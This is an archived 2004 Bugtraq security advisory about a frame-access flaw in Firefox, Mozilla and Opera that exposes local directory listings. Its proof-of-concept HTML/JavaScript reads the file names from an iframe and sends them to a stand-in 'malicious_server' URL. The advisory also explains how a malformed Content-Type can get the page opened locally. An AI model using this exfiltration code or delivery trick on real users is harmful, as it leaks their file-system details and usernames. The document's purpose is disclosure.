Disclosure of file system information in Mozilla Firefox and Opera Browser:

From: Giovanni Delvecchio (badpenguin79_at_hotmail.com)
Date: 12/01/04

Next message: Hillel Himovich: "Invision Power Board 'Allow auto login' setting override"

Previous message: Marcus Meissner: "SUSE Security Announcement: various kernel problems (SUSE-SA:2004:042)"
Next in thread: Liu Die Yu: "Re: Disclosure of file system information in Mozilla Firefox and Opera Browser:"
Reply: Liu Die Yu: "Re: Disclosure of file system information in Mozilla Firefox and Opera Browser:"
Maybe reply: Thor Larholm: "RE: Disclosure of file system information in Mozilla Firefox and Opera Browser:"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: bugtraq@securityfocus.com
Date: Wed, 01 Dec 2004 16:15:25 +0000

Title: Disclosure of file system information in Mozilla Firefox and Opera
Browser

Note:
I don't know if it could be considered really a security problem, anyway
i'll try to explain my ideas.
Sorry for my bad english.

Author: Giovanni Delvecchio

Bug: Disclosure of file system information

Applications affected:

- Firefox 1.0
- Mozilla 1.7
- Opera 7.54 (*)

( maybe also previous versions )

Tested versions:

- Firefox 1.0 on Linux and Windows
- Mozilla 1.7 on Windows
- Opera 7.51,..7.54 on Linux

Note:
The content of this advisory could be applied also to other browsers, i have
checked just Mozilla, Firefox,Opera and Microsoft Internet Explorer.
Microsoft Internet Explorer seems not to be affected.

Bug Description:
================
A problem exist in some browsers where a frame can gain access to attributes
of another frame or iframe.
An application of this bug could be the possibility to disclose local
directory structure.

PoC:
===

------ begin code.htm -----

<html>

<body onLoad="

  list_files='';
  for(i=0;i<local_files.document.links.length;i++)
           {list_files+=local_files.document.links.item(i);}
  alert(list_files);
  //send list_files at malicious_server

document.location.href='http://malicious_server/grab.php?list='+list_files;

</body>

</html>

------ end of code.htm -------

Impact:
======
A malicious server could obtain the content of /home/ directory ( or
c:\Document and Setting\ for windows system ) and so know a set of
usernames present on system target.
Moreover, colud be possible know if a particolar program is installed on
target system for a succesive attack.

Anyway it cannot be exploited "directly" by a remote site, but only if the
page is opened from a local path ( file://localpath/code.htm), since the
iframe "local_files" belongs to a local domain.

Note: with Internet Explorer code.htm doesn't work even in local.

Possible Remote Exploitation:
========================

Question:
How could a malicious remote user exploit it ?

Answer:
After that the user "victim" has required http://maliciuos_server/code.htm,
if malicious_server responds with a page containing an unknown Content-Type
field ( for example text/html. ,note the dot) ,the browser will show a
dialog window with some options (open, save, cancel). Choosing "Open" to
view this page, it will be downloaded and opened in local ; javascript code
will be executed in local context.
Obviously, if user chooses to save and after open it the result is equal.

(*) For Opera this method of remote exploitation requires that opera must
be setted as Default Application in "handler for saved files" whether the
user choose "Open" in the dialog window.

Solution:
========
No solution at the moment

Vendor notice
==============
24th November 2004: I have contacted mozilla by security@mozilla.org
and Opera by its bug track page at https://bugs.opera.com/wizard/

No response from both at the moment.

Best regards,

Giovanni Delvecchio

_________________________________________________________________
Personalizza MSN Messenger con sfondi e fotografie!
http://www.ilovemessenger.msn.it/

Next message: Hillel Himovich: "Invision Power Board 'Allow auto login' setting override"

Previous message: Marcus Meissner: "SUSE Security Announcement: various kernel problems (SUSE-SA:2004:042)"
Next in thread: Liu Die Yu: "Re: Disclosure of file system information in Mozilla Firefox and Opera Browser:"
Reply: Liu Die Yu: "Re: Disclosure of file system information in Mozilla Firefox and Opera Browser:"
Maybe reply: Thor Larholm: "RE: Disclosure of file system information in Mozilla Firefox and Opera Browser:"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

RE: Disclosure of file system information in Mozilla Firefox and Opera Browser:
... Mozilla shares the same zone design as IE which means that a file from ... I agree that Mozilla has implemented quite a lot of proprietary IE ... Disclosure of file system information in Mozilla Firefox and ... Mozilla 1.7 on Windows ...
(Bugtraq)
Re: Windows 98 box is owned
... Maybe switch to Windows 2000/XP or Linux. ... Have her use Mozilla or Opera. ... If you decide to install Windows 2000/XP use a PFW ...
(Security-Basics)
Re: [SLE] Website problem
... >>Mozilla and Opera in Windows and it worked ... It completely failed to run under wine for me. ...
(SuSE)
Re: Firefox or Opera? Evolution or T-bird?
... I still prefer the Mozilla suite. ... used Netscape Communicator and then Mozilla under Windows. ... I have Opera on this machine and have it licenced (I like those people ... music) throug a flash menue is awkward in FF/Mozilla and runs perfectly ...
(Fedora)
Re: Well, its official -- stop using Internet Explorer
... Windows and Internet Explorer ... Mozilla and Firefox are both open source [don't know about Opera], ...
(microsoft.public.windowsxp.general)